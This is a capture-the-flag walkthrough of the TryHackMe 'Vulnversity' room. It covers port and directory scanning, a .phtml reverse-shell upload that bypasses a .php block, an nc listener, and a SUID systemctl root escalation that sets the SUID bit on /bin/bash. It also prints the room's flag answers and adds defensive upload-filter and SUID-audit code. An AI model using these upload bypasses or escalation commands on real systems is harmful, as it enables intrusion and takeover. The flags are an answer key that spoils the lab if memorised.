Vulnversity Walkthrough TryHackMe

performed by: jb-williams

Reconnaissance

They first ask you to search for any nmap resources (cheat sheets) online; I came across this one that seemed really useful: https://www.stationx.net/nmap-cheat-sheet/

The First Real Question

Scan the box, how many ports are open?

I like to build up a chain of commands for most boxes.

  • While doing my scans I like to create a file that contains just the numerical port values. So my command came out like this:
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.124.14 && grep -E '^[0-9]+/(tcp|udp) +open' nmap/initial.nmap | cut -d' ' -f1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l
  • Number of ports open: 6

What version of the squid proxy is running on the machine?

grep -i "squid" nmap/initial.nmap | awk '{print $NF}'
  • Version of Squid Proxy: 3.5.12

How many ports will nmap scan if the flag -p-400 is used?

  • Looking at man page or online resource: 400

Using the nmap flag -n what will it not resolve?

  • Looking at man page or online resource: DNS

What is the most likely operating system this machine is running?

grep -i "os" nmap/initial.nmap
  • Quickly scanning the output, you can see that Ubuntu is listed most.

What port is the web server running on?

grep -i "http" nmap/initial.nmap
  • HTTP server is on port: 3333

It's important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (each of which can be a point of exploitation) is very important; don't forget that ports in a higher range might be open, so always scan ports above 1000 as well (even if you leave that scan running in the background).

Locating directories using GoBuster

Using gobuster:

GoBuster flag   Description
-e              Print the full URLs in your console
-u              The target URL
-w              Path to your wordlist
-U and -P       Username and password for Basic Auth
-p              Proxy to use for requests
-c              Specify a cookie for simulating your auth

What is the directory that has an upload form page?

gobuster dir -u http://10.10.124.148:3333 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster.txt -t 15

I like using feroxbuster; it gave me more info, especially about the directory path, sooner.

feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -e -u http://10.10.124.148:3333/
  • The directory that has an upload form page is: /internal/ (and /internal/uploads, but they don't ask for this one; it's just important to know about later)

Compromise the webserver

After finding the form to upload files:

What file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.*

  • First, trying to upload a reverse shell (reverseshell.php): this was blocked.

  • The room walks you through using Burp to fuzz the upload form; I wrote a Python script to fuzz for me.

  • URL for the room, to follow the Burp walkthrough:

  • Vulnversity

  • After testing different PHP file extensions, using curl, Python, Burp and ZAP to fuzz the upload form, you come across this one working: .phtml

  • Download this PHP reverse shell: downloadLink - php-reverse-shell.phtml

  • Edit the file, changing the IP to your tun0 THM IP and desired port.
  • Set up a listener on the port specified in the reverse shell, e.g.:
nc -lnvp 4444
  • Upload the reverse shell via the upload form and navigate here to execute the payload: http://<IP>:3333/internal/uploads/php-reverse-shell.phtml
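The .php-only block and the .phtml bypass above are a textbook denylist failure. As an added example (not code from the room or this write-up), here is that weak check next to an allowlist check that refuses the same file; the extension sets and the form's real filter logic are assumptions made for the illustration.

```python
import os

# Extensions a common PHP handler configuration also executes besides .php.
# Illustrative set constructed for this example, not read from the target.
PHP_EXECUTABLE_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps"}
# Upload types the form is actually meant to accept (assumed for the example).
ALLOWED_EXTS = {".jpg", ".jpeg", ".png", ".pdf"}

def weak_denylist_allows(filename):
    """The filter the room's form appears to use: refuse only a .php suffix."""
    return os.path.splitext(filename)[1].lower() != ".php"

def hardened_allows(filename):
    """Allowlist check on the whole basename: the last extension must be on the
    allowlist and no dotted segment may be a PHP-executable extension, so
    shell.phtml, shell.php.jpg, shell.PHtml and .htaccess are all refused."""
    base = os.path.basename(filename)          # drop any path the client sent
    if "\x00" in base:
        return False
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:         # no extension, or a dotfile
        return False
    exts = {"." + p for p in parts[1:]}
    if exts & PHP_EXECUTABLE_EXTS:
        return False
    return "." + parts[-1] in ALLOWED_EXTS

def triage(filenames):
    """Map each name to (weak verdict, hardened verdict) for a quick comparison."""
    return {n: (weak_denylist_allows(n), hardened_allows(n)) for n in filenames}

if __name__ == "__main__":
    # Constructed sample names, including the two the write-up tried.
    for name, (weak, hard) in triage(["reverseshell.php", "php-reverse-shell.phtml",
                                      "shell.php.jpg", "photo.JPG"]).items():
        print(f"{name:28} denylist={'pass' if weak else 'block'} allowlist={'pass' if hard else 'block'}")
```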

What is the name of the user who manages the webserver?*

  • Once on the machine:
  • List the /home directory (ls /home) and see the user: bill

What is the user flag?

  • List /home/bill (ls /home/bill) and see user.txt
cat /home/bill/user.txt
  • The contents of user.txt: 8bd7992fbe8a6ad22a63361004cfcedb

Privilege Escalation

Per THM -
In Linux, SUID (set owner user ID upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).

For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because, to change your password, it needs to write to the shadow file, which you do not have access to but root does, so it runs with root privileges to make the right changes.

On the system search for all SUID files. What file stands out?

  • I tend to use this find command to search for SUID files:
find / -perm -4000 2>/dev/null
  • Sort of using my own system as a reference, I saw this one looking fairly unusual: /bin/systemctl
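The "compare against my own system" idea above, written out as a baseline diff. This is an added example, not from the room or this write-up; the EXPECTED_SUID baseline and the sample tree are constructed for illustration, and a real baseline should be taken from a known-good install.

```python
import os
import stat
import tempfile

# Assumed baseline of SUID binaries expected on a stock Ubuntu-like host
# (illustrative only; build the real one from a known-good install).
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su", "/bin/mount", "/bin/umount"}

def find_suid(root="/"):
    """Regular files under root with the SUID bit set: the write-up's
    `find / -perm -4000 2>/dev/null`, with unreadable paths skipped."""
    found = set()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)              # lstat: don't follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def classify(paths, expected=EXPECTED_SUID, strip_prefix=""):
    """Split SUID paths into (expected, unexpected). strip_prefix maps a test
    tree such as /tmp/x/bin/systemctl onto the logical name /bin/systemctl."""
    logical = {p[len(strip_prefix):] if p.startswith(strip_prefix) else p for p in paths}
    return sorted(logical & expected), sorted(logical - expected)

def build_sample_tree():
    """Constructed sample: a temp tree mimicking the box, with bin/systemctl
    and usr/bin/passwd marked SUID and bin/ls left as a normal binary."""
    d = tempfile.mkdtemp()
    for rel, mode in (("bin/systemctl", 0o4755), ("usr/bin/passwd", 0o4755), ("bin/ls", 0o755)):
        p = os.path.join(d, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        open(p, "w").close()
        os.chmod(p, mode)
    return d

if __name__ == "__main__":
    _known, odd = classify(find_suid("/"))
    for p in odd:
        print("unexpected SUID:", p)   # on the room's box this flags /bin/systemctl
```

The same diff also catches the SUID bit that the chmod +s step in the escalation leaves on /bin/bash, which is why a periodic baseline comparison is a cheap detection for this whole class of persistence.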

Become root and get the last flag (/root/root.txt)

  • Navigate to GTFOBins and search for that binary.
  • I took the Sudo (b) one and modified it:
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

  • I literally copy/pasted that chunk into my terminal and ran it.
  • Then I ran bash -p to escalate to root
  • As root you can list the /root dir (ls /root) and see root.txt
  • Cat out root.txt: cat /root/root.txt
  • The contents of root.txt: a58ff8579f0a9270368d33a9966c7fd5

written and performed by jb-williams - github